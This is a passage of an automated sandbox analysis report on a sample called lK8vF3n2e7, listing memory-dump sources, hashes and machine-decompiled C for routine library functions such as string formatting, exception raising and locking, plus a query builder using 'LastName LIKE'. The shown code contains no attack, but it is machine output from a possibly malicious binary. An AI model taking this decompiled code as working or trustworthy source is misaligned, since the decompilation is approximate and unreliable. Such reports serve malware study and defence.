                                                                              0x00417c0d
                                                                              0x00417c0f
                                                                              0x00417c12
                                                                              0x00417c21
                                                                              0x00417c24
                                                                              0x00417c3f
                                                                              0x00417c26
                                                                              0x00417c3a
                                                                              0x00417c3a
                                                                              0x00417c44
                                                                              0x00417c48
                                                                              0x00417c57
                                                                              0x00417c57
                                                                              0x00417c5d
                                                                              0x00000000
                                                                              0x00417c4a
                                                                              0x00417c4a
                                                                              0x00417c4c
                                                                              0x00417c4e
                                                                              0x00417c4f
                                                                              0x00417c54
                                                                              0x00000000
                                                                              0x00417c54
                                                                              0x00417c48
                                                                              0x00417c14
                                                                              0x00417c15
                                                                              0x00417c16
                                                                              0x00417c1c
                                                                              0x00000000
                                                                              0x00417c1c
                                                                              0x00417bd8
                                                                              0x00417beb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417bed
                                                                              0x00417bed
                                                                              0x00417bee
                                                                              0x00000000
                                                                              0x00417bf3
                                                                              0x00417bd8
                                                                              0x00417ba1
                                                                              0x00417ba7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417bb3
                                                                              0x00417bb5
                                                                              0x00000000
                                                                              0x00417bb5

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: __getbuf
                                                                              • String ID: @xE$zE
                                                                              • API String ID: 554500569-1012254608
                                                                              • Opcode ID: 8e6ef69631a81af98d2147c48e0c2b2943f1a9fa26f545baf9991f21b2dda224
                                                                              • Instruction ID: 6acc455c36f27614f13c3cf7468f4bf721d5ddce4ef2ce29d7a5501ca18d220c
                                                                              • Opcode Fuzzy Hash: 8e6ef69631a81af98d2147c48e0c2b2943f1a9fa26f545baf9991f21b2dda224
                                                                              • Instruction Fuzzy Hash: D131C6315087049FD7308F19D881AA6B7B4DF41364F04892EE8AA8B381E73CE9848B48
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407F26, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00407F26(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t75;
				void* _t83;
				void* _t86;
				char* _t87;
				void* _t90;
				void* _t92;
				void* _t96;

				_t96 = __eflags;
				E004128A0(E00430CD1, _t90);
				_t60 = __ecx;
				_t32 = E00428A50();
				_t82 =  *_t32;
				 *((intOrPtr*)(_t90 - 0x10)) =  *((intOrPtr*)( *_t32 + 0xc))(_t83, _t86, _t59) + 0x10;
				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
				E004063E4(E0040669E(0x458420));
				E0040763F(_t90 - 0x10, "LastName LIKE ");
				E00425C57(_t60);
				_t87 = "\'";
				_t41 = E00407A53(_t60);
				 *(_t90 - 4) = 1;
				_t43 = E004079E3(_t60 + 0x124, _t96);
				 *(_t90 - 4) = 2;
				_t45 = E00407A53(_t60 + 0x124);
				 *(_t90 - 4) = 3;
				E004075F2(_t60, _t90 - 0x10, _t90, _t45);
				E00401000( *((intOrPtr*)(_t90 - 0x14)) + 0xfffffff0,  *_t32);
				E00401000( *((intOrPtr*)(_t90 - 0x18)) + 0xfffffff0,  *_t32);
				_t75 =  *((intOrPtr*)(_t90 - 0x1c)) + 0xfffffff0;
				 *(_t90 - 4) = 0;
				E00401000(_t75, _t82);
				 *((short*)(_t90 - 0x2c)) = 8;
				 *((intOrPtr*)(_t90 - 0x24)) = E0041FCB0(_t75, 0x4326f8);
				_t88 =  *((intOrPtr*)(_t90 - 0x10));
				 *((intOrPtr*)(_t90 - 0x1c)) = _t92 - 0x20 + 0x24;
				 *(_t90 - 4) = 4;
				E0040678C(_t92 - 0x20 + 0x24);
				 *(_t90 - 4) = 4;
				E00407310(E0040669E(0x458420));
				_t55 = _t90 - 0x2c;
				 *(_t90 - 4) = 0;
				__imp__#9(_t55,  *((intOrPtr*)(_t90 - 0x10)), _t75, 0, 1, _t90 - 0x2c, _t90 - 0x14, _t43, _t87, _t90 - 0x18, _t41, _t60 + 0x124, _t90 - 0x1c, _t90 - 0x10, _t87, 1);
				if(_t55 < 0) {
					E0041FC30(_t55);
				}
				E00407664(_t60, _t60, 0x458420, _t88);
				_t57 = E00401000(_t88 - 0x10, _t82);
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t57;
			}





















                                                                              0x00407f26
                                                                              0x00407f2b
                                                                              0x00407f36
                                                                              0x00407f38
                                                                              0x00407f3d
                                                                              0x00407f47
                                                                              0x00407f4a
                                                                              0x00407f5c
                                                                              0x00407f69
                                                                              0x00407f72
                                                                              0x00407f77
                                                                              0x00407f85
                                                                              0x00407f96
                                                                              0x00407f9a
                                                                              0x00407fa5
                                                                              0x00407fa9
                                                                              0x00407fb5
                                                                              0x00407fb9
                                                                              0x00407fc4
                                                                              0x00407fcf
                                                                              0x00407fd7
                                                                              0x00407fda
                                                                              0x00407fde
                                                                              0x00407fe8
                                                                              0x00407ff3
                                                                              0x00407ff6
                                                                              0x00408004
                                                                              0x00408008
                                                                              0x0040800c
                                                                              0x00408013
                                                                              0x0040801e
                                                                              0x00408023
                                                                              0x00408027
                                                                              0x0040802b
                                                                              0x00408033
                                                                              0x00408036
                                                                              0x00408036
                                                                              0x0040803d
                                                                              0x00408045
                                                                              0x0040804f
                                                                              0x00408058

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407F2B
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                                • Part of subcall function 00407A53: __EH_prolog.LIBCMT ref: 00407A58
                                                                                • Part of subcall function 004079E3: __EH_prolog.LIBCMT ref: 004079E8
                                                                                • Part of subcall function 00407A53: _strlen.LIBCMT ref: 00407A8E
                                                                                • Part of subcall function 0041FCB0: lstrlenA.KERNEL32(?), ref: 0041FCE2
                                                                                • Part of subcall function 0041FCB0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0041FCF8
                                                                                • Part of subcall function 0040678C: __EH_prolog.LIBCMT ref: 00406791
                                                                                • Part of subcall function 00407310: __EH_prolog.LIBCMT ref: 00407315
                                                                              • VariantClear.OLEAUT32(00000008), ref: 0040802B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ByteCharClearMultiVariantWide_strlenlstrlen
                                                                              • String ID: LastName LIKE
                                                                              • API String ID: 363168213-2611627017
                                                                              • Opcode ID: 4eac84c690d29f96d8d1ae116c6d98f5f3b5857d1077201e88d1748835a80e72
                                                                              • Instruction ID: a39476e610684e5fe9a2661ed1b74580fa46c41ad10017c35eedca349a0b8653
                                                                              • Opcode Fuzzy Hash: 4eac84c690d29f96d8d1ae116c6d98f5f3b5857d1077201e88d1748835a80e72
                                                                              • Instruction Fuzzy Hash: 26319271E00148ABDB04E7B9C856BEFB7A8AF4435CF00456EF516B72C2DA7C5A0487A9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419FB1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E00419FB1(intOrPtr* __eax, char* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, char _a12) {
				signed int _t33;
				char* _t40;
				char* _t47;
				char* _t48;
				intOrPtr* _t49;
				intOrPtr* _t50;
				char* _t51;
				char _t52;
				intOrPtr* _t62;
				signed int _t63;
				signed int _t64;

				_t40 = __ebx;
				_t62 = __eax;
				if(_a12 != 0) {
					E00419F94((0 |  *__eax == 0x0000002d) + __ebx, 0 | _a4 > 0x00000000);
				}
				_t28 = _t40;
				if( *_t62 == 0x2d) {
					 *_t40 = 0x2d;
					_t28 = _t40 + 1;
				}
				if(_a4 > 0) {
					_t51 = _t28 + 1;
					 *_t28 =  *_t51;
					_t28 = _t51;
					_t52 =  *0x457abc; // 0x2e
					 *_t51 = _t52;
				}
				_t47 = E00419460((0 | _a12 == 0x00000000) + _t28 + _a4, "e+000");
				if(_a8 != 0) {
					 *_t47 = 0x45;
				}
				_t48 = _t47 + 1;
				if( *((char*)( *((intOrPtr*)(_t62 + 0xc)))) != 0x30) {
					_t33 =  *((intOrPtr*)(_t62 + 4)) - 1;
					if(_t33 < 0) {
						_t33 =  ~_t33;
						 *_t48 = 0x2d;
					}
					_t49 = _t48 + 1;
					if(_t33 >= 0x64) {
						asm("cdq");
						_t64 = 0x64;
						 *_t49 =  *_t49 + _t33 / _t64;
						_t33 = _t33 % _t64;
					}
					_t50 = _t49 + 1;
					if(_t33 >= 0xa) {
						asm("cdq");
						_t63 = 0xa;
						 *_t50 =  *_t50 + _t33 / _t63;
						_t33 = _t33 % _t63;
					}
					 *((intOrPtr*)(_t50 + 1)) =  *((intOrPtr*)(_t50 + 1)) + _t33;
				}
				return _t40;
			}














                                                                              0x00419fb1
                                                                              0x00419fb9
                                                                              0x00419fbb
                                                                              0x00419fd4
                                                                              0x00419fd9
                                                                              0x00419fdd
                                                                              0x00419fdf
                                                                              0x00419fe1
                                                                              0x00419fe4
                                                                              0x00419fe4
                                                                              0x00419feb
                                                                              0x00419fed
                                                                              0x00419ff2
                                                                              0x00419ff4
                                                                              0x00419ff6
                                                                              0x00419ffc
                                                                              0x00419ffc
                                                                              0x0041a01c
                                                                              0x0041a01e
                                                                              0x0041a020
                                                                              0x0041a020
                                                                              0x0041a026
                                                                              0x0041a02a
                                                                              0x0041a02f
                                                                              0x0041a030
                                                                              0x0041a032
                                                                              0x0041a034
                                                                              0x0041a034
                                                                              0x0041a037
                                                                              0x0041a03b
                                                                              0x0041a03d
                                                                              0x0041a040
                                                                              0x0041a043
                                                                              0x0041a045
                                                                              0x0041a045
                                                                              0x0041a047
                                                                              0x0041a04b
                                                                              0x0041a04d
                                                                              0x0041a050
                                                                              0x0041a053
                                                                              0x0041a055
                                                                              0x0041a055
                                                                              0x0041a057
                                                                              0x0041a057
                                                                              0x0041a05e

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: __shift_strcat_strlen
                                                                              • String ID: e+000
                                                                              • API String ID: 208078240-1027065040
                                                                              • Opcode ID: 42616503be8c7573ea38e254a357175daa829c594adc9f4f1e626597b1da27f2
                                                                              • Instruction ID: 49197515b30677988268bfe23769aa6f66af329e348120644e6b7bacb5b61efd
                                                                              • Opcode Fuzzy Hash: 42616503be8c7573ea38e254a357175daa829c594adc9f4f1e626597b1da27f2
                                                                              • Instruction Fuzzy Hash: 2F21AE322093945FD71A8E389CA07E63F949B07358F1C44AFE085CA292D67ED9C6C35A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407EB2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00407EB2(void* __ecx) {
				void* __ebp;
				long* _t16;
				void* _t17;

				_t17 = __ecx;
				E004248A3(__ecx);
				E0040763F(_t17 + 0x120, "You are now disconnected");
				_push(0);
				E00425C57(_t17);
				_t16 = _t17 + 0x128;
				SendMessageA( *(_t17 + 0x1c), 0x80, 1,  *_t16);
				SendMessageA( *(_t17 + 0x1c), 0x80, 0,  *_t16);
				return 1;
			}






                                                                              0x00407eb6
                                                                              0x00407eb8
                                                                              0x00407ec8
                                                                              0x00407ecd
                                                                              0x00407ed1
                                                                              0x00407edc
                                                                              0x00407eef
                                                                              0x00407ef9
                                                                              0x00407f02

                                                                              APIs
                                                                                • Part of subcall function 00425C57: __EH_prolog.LIBCMT ref: 00425C5C
                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 00407EEF
                                                                              • SendMessageA.USER32(?,00000080,00000000,?), ref: 00407EF9
                                                                              Strings
                                                                              • You are now disconnected, xrefs: 00407EBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$H_prolog
                                                                              • String ID: You are now disconnected
                                                                              • API String ID: 1044275984-1446601973
                                                                              • Opcode ID: 4f444b52a2b3a6c0eba978bbca680b64658326418fefbe5be81fd9bfc7d48796
                                                                              • Instruction ID: db815257b76fa78ff58344e40ec2a72f0eb2c5048cfbb90b59a668fa96a059d9
                                                                              • Opcode Fuzzy Hash: 4f444b52a2b3a6c0eba978bbca680b64658326418fefbe5be81fd9bfc7d48796
                                                                              • Instruction Fuzzy Hash: 43F0E5312007147FE6306A62EC81F977769EF44358F10082AF181220E0CAA778159658
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042254F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0042254F(intOrPtr* __ecx, char _a4) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t21;
				intOrPtr* _t22;

				_t22 = __ecx;
				_t1 =  &_a4; // 0x44e630
				_t21 =  *_t1;
				 *__ecx = 0x44e7d0;
				_t9 =  *((intOrPtr*)(_t21 + 8));
				 *((intOrPtr*)(__ecx + 8)) = _t9;
				if(_t9 == 0) {
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t21 + 4));
				} else {
					_t14 = E00412247(E00411A30( *((intOrPtr*)(_t21 + 4))) + 1);
					 *((intOrPtr*)(_t22 + 4)) = _t14;
					if(_t14 != 0) {
						E00419460(_t14,  *((intOrPtr*)(_t21 + 4)));
					}
				}
				return _t22;
			}







                                                                              0x00422550
                                                                              0x00422553
                                                                              0x00422553
                                                                              0x00422557
                                                                              0x0042255d
                                                                              0x00422562
                                                                              0x00422565
                                                                              0x0042258f
                                                                              0x00422567
                                                                              0x00422571
                                                                              0x0042257a
                                                                              0x0042257d
                                                                              0x00422583
                                                                              0x00422589
                                                                              0x0042257d
                                                                              0x00422596

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat_strlen
                                                                              • String ID: 0D
                                                                              • API String ID: 432593777-130544292
                                                                              • Opcode ID: 245b0eaabc1113af17cd50058898e9e5956153ac3d766621995d16eff27b125f
                                                                              • Instruction ID: 660e6d80282afe55b9ca1b5ba13e9f57e9cf4bf23a46981716cdfd782ecacaad
                                                                              • Opcode Fuzzy Hash: 245b0eaabc1113af17cd50058898e9e5956153ac3d766621995d16eff27b125f
                                                                              • Instruction Fuzzy Hash: 62F012B16096117F97149B56E601856F7E8FF14710310C92FE469C3650E7B4EC91CA98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004205CC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 75%
                                                                              			E004205CC(void* __eflags) {
				intOrPtr* _t19;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;

				E004128A0(E0043157B, _t23);
				E00420298(_t23 - 0x28, __eflags, "string too long");
				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
				_push(_t23 - 0x28);
				_t19 = _t23 - 0x50;
				E00420460(_t19,  *(_t23 - 4));
				_t6 = _t23 - 0x50; // 0x453434
				 *((intOrPtr*)(_t23 - 0x50)) = 0x44e630;
				E004128BF(_t6, 0x453434);
				asm("int3");
				_push( *((intOrPtr*)(_t24 - 0x44 + 8)));
				_t21 = _t19;
				E00420571(_t19);
				 *_t21 = 0x44e630;
				return _t21;
			}







                                                                              0x004205d1
                                                                              0x004205e1
                                                                              0x004205e6
                                                                              0x004205ed
                                                                              0x004205ee
                                                                              0x004205f1
                                                                              0x004205fb
                                                                              0x004205ff
                                                                              0x00420606
                                                                              0x0042060b
                                                                              0x0042060d
                                                                              0x00420611
                                                                              0x00420613
                                                                              0x00420618
                                                                              0x00420621

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004205D1
                                                                                • Part of subcall function 00420460: __EH_prolog.LIBCMT ref: 00420465
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                                • Part of subcall function 00420571: __EH_prolog.LIBCMT ref: 00420576
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionRaise
                                                                              • String ID: 44E$string too long
                                                                              • API String ID: 2062786585-1535144175
                                                                              • Opcode ID: c96dab0491a1c3167e5770b79897b544847c4d45c5a5cf4b205a4e3f71641e6b
                                                                              • Instruction ID: cd35089e4a56513c013366e30973142a941b0513eef853e0cfbbcd2deb006add
                                                                              • Opcode Fuzzy Hash: c96dab0491a1c3167e5770b79897b544847c4d45c5a5cf4b205a4e3f71641e6b
                                                                              • Instruction Fuzzy Hash: 3DE0E5B1A00128A7C700FFE1D802ACEB7B4BF24355F80851FF400A6156DBBC85488BAC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00420531, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 81%
                                                                              			E00420531(void* __eflags) {
				intOrPtr* _t27;
				intOrPtr* _t35;
				void* _t37;

				E004128A0(E0043157B, _t37);
				E00420298(_t37 - 0x28, __eflags, "invalid string position");
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				_push(_t37 - 0x28);
				_t27 = _t37 - 0x50;
				E00420460(_t27, __eflags);
				 *((intOrPtr*)(_t37 - 0x50)) = 0x44e63c;
				E004128BF(_t37 - 0x50, 0x4533b0);
				asm("int3");
				E004128A0(E00431569, _t37);
				_push(_t27);
				_t31 =  *((intOrPtr*)(_t37 + 8));
				_t35 = _t27;
				 *((intOrPtr*)(_t37 - 0x10)) = _t35;
				E0042254F(_t27,  *((intOrPtr*)(_t37 + 8)));
				 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
				 *_t35 = 0x44e624;
				E00403B83(_t35 + 0xc, _t31 + 0xc);
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t35;
			}






                                                                              0x00420536
                                                                              0x00420546
                                                                              0x0042054b
                                                                              0x00420552
                                                                              0x00420553
                                                                              0x00420556
                                                                              0x00420564
                                                                              0x0042056b
                                                                              0x00420570
                                                                              0x00420576
                                                                              0x0042057b
                                                                              0x0042057e
                                                                              0x00420581
                                                                              0x00420584
                                                                              0x00420587
                                                                              0x0042058c
                                                                              0x00420597
                                                                              0x0042059d
                                                                              0x004205a9
                                                                              0x004205b1

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00420536
                                                                                • Part of subcall function 00420460: __EH_prolog.LIBCMT ref: 00420465
                                                                                • Part of subcall function 004128BF: RaiseException.KERNEL32(?,?,?,?,0045A0D8,00000000), ref: 004128ED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog$ExceptionRaise
                                                                              • String ID: <D$invalid string position
                                                                              • API String ID: 2062786585-1737862221
                                                                              • Opcode ID: 6461c3475ee7efb81e19f03c249e580cb41d76462ae92be3bb7c1df470df78fb
                                                                              • Instruction ID: 59a6efc3b7158ee38e0614d9221a968775124c8b4a3fe33e62db44cea458a9e3
                                                                              • Opcode Fuzzy Hash: 6461c3475ee7efb81e19f03c249e580cb41d76462ae92be3bb7c1df470df78fb
                                                                              • Instruction Fuzzy Hash: 8EE08CB190011CAACB00FBE1C807ACE73B8BF24309F94815BF401E5046DFB856088A2D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041CCFB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041CCFB(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;
				void* _t8;
				void* _t11;

				_t2 = _a4;
				if(_t2 < 0x457ac8 || _t2 > 0x457d28) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E004148F8(_t8, _t11, (_t2 - 0x457ac8 >> 5) + 0x10);
				}
			}







                                                                              0x0041ccfb
                                                                              0x0041cd06
                                                                              0x0041cd1f
                                                                              0x0041cd23
                                                                              0x0041cd29
                                                                              0x0041cd0f
                                                                              0x0041cd1e
                                                                              0x0041cd1e

                                                                              APIs
                                                                              • __lock.LIBCMT ref: 0041CD18
                                                                                • Part of subcall function 004148F8: EnterCriticalSection.KERNEL32(?,?,?,00414733,00000004,0044BD00,00000010,004164BE,00000001,0000008C,?,0044BC68,00000060), ref: 00414920
                                                                              • EnterCriticalSection.KERNEL32(?,00422721,?,0044E808,0000000C,00421305,?), ref: 0041CD23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEnterSection$__lock
                                                                              • String ID: (}E
                                                                              • API String ID: 3410214836-1429765358
                                                                              • Opcode ID: 7c6143fd1b5c939171a8b81e0d3eea32178bad485a97dc063076ffd0903f3e15
                                                                              • Instruction ID: 6da6b200d2b2378a4a7b5ee90335d753f3eaeb3ff4692c331bcdd93487e60daf
                                                                              • Opcode Fuzzy Hash: 7c6143fd1b5c939171a8b81e0d3eea32178bad485a97dc063076ffd0903f3e15
                                                                              • Instruction Fuzzy Hash: 7CD022B660020113EF2C26B6BFC955D3A1CEA803833284C7BFA01C12C2CF2CD8C0411C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00422257, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00422257() {

				E00422288(0x453720, 0x458378);
				goto __eax;
			}



                                                                              0x00422269
                                                                              0x00422270

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00422269
                                                                                • Part of subcall function 00422288: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004222FF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                              • String ID: W"B$x"B
                                                                              • API String ID: 123106877-1503379534
                                                                              • Opcode ID: 41246cb5f60f665431d29ea6b1548c52e7ae522f50dc775474ae167bce50599f
                                                                              • Instruction ID: d8e7f714c227ad55c174fcca8010151fad5562a3f4915d7de80357c28d51ad38
                                                                              • Opcode Fuzzy Hash: 41246cb5f60f665431d29ea6b1548c52e7ae522f50dc775474ae167bce50599f
                                                                              • Instruction Fuzzy Hash: 75B092C2B98225BD210451016A0283A150CC080B533B0835FFC01E01429A8AAA4A003F
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0222499D, Relevance: 5.1, APIs: 4, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Offset: 02221000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_2221000_lK8vF3n2e7.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID:
                                                                              • API String ID: 2221118986-0
